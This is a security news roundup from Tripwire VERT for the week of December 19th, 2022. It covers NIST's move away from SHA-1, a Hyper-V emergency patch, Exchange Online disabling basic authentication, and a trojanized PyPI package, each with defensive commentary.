All of us at Tripwire’s Vulnerability Exposure and Research Team (VERT) are constantly looking out for interesting stories and developments in the infosec world. Here’s what cybersecurity news stood out to us during the week of December 19th, 2022. I’ve also included some comments on these stories.
NIST Recommends upgrading from SHA-1
The SHA-1 algorithm has reached the end of its usefulness, according to security experts at the National Institute of Standards and Technology (NIST) , and is being put out to pasture. NIST now recommends that IT professionals replace all existing instances of SHA-1 with newer, more secure algorithms.
NIST is recommending that any company that is still using the SHA-1 hashing algorithm transition to a more secure algorithm by Dec 31, 2030. SHA-1 has not been considered secure for some time. SHA-1 should not be used for security related products because it can potentially be broken and abused by attackers to create a known good hash for a malicious file. Hashing algorithms like MD5 have already been retired by some organizations and it only makes sense to reduce the use of legacy hashing algorithms.
Hyper-V Receives an Emergency Fix
Microsoft has released emergency out-of-band (OOB) Windows Server updates to address a known issue that appears after installing this month's Patch Tuesday updates, states Bleeping Computer. The flaw breaks virtual machine (VM) creation on Hyper-V hosts and affects only VMs managed with the System Center Virtual Machine Manager (SCVMM) and using Software Defined Networking (SDN).
This month’s Patch Tuesday patch broke the VM creation on Hyper-V hosts when managed by System Center Virtual Machine Manager and Software Defined Networking. Windows Server 2019 and Windows Server 2022 are subject to this issue after installing patches for December. To resolve this issue, you will need to install KB5022554 for Windows Server 2019 or KB5022553 for Windows Server 2022. A workaround can be found here.
Basic Auth will be turned off for Exchange Online in January
Microsoft warned that in January 2023 it will permanently turn off Exchange Online basic authentication in order to improve security, Bleeping Computer noted on December 20th. "Beginning in early January, we will send Message Center posts to affected tenants about 7 days before we make the configuration change to permanently disable Basic auth use for protocols in scope," the Exchange Team reported on Tuesday.
Microsoft will be turning off basic authentication to improve the security of Exchange Online. Affected tenants will be notified by Message Center posts prior to the deactivation of basic authentication. Once it is deactivated users that have not migrated to a modern form of authentication will receive an HTTP 401 error. Basic authentication will not be turned back on for customers after it is deactivated.
It is recommended to upgrade to a more modern authentication mechanism. If possible, the use of two-factor authentication should be enabled to harden security. Two-factor authentication makes it more difficult for attackers to authenticate with systems without finding a bypass or convincing users to log them in.
PyPI packages contain malicious data
Threat actors have published a malicious Python package on PyPI named ‘SentinelOne’, Bleeping Computer noted. Disguised as the legitimate SDK client for the actual American cybersecurity firm ‘SentinelOne’, it performs as expected – accessing the company’s API from within another project – but in reality is a trojanized attack that steals data from compromised systems.
Malicious packages have been hosted in GIT and other repositories. A “SentinelOne” package on PyPI claims to be a legitimate SDK, but it contains malicious content. This package claims to extend the functionality access the SentinelOne API. However, to access the SentinelOne API, it uses a legitimate package from another project. The malicious package then tries to harvest sensitive data from the developer’s system. This package was discovered by ReversingLabs.
Malicious content can be posted to public repositories without the code being verified. It is easy to trust certain sources, but malicious code can be hidden in plain sight. Therefore, it is necessary to review code to determine if the content of the package is not malicious. Attackers usually pretend to be a legitimate source of information and provide users with something useful. To ensure that they do not get caught attackers usually leverage a legitimate package to give developers the data that they want.
Keep in Touch with Tripwire VERT
Want more insights from Tripwire VERT before our next cybersecurity news roundup comes out? Subscribe to our newsletter here.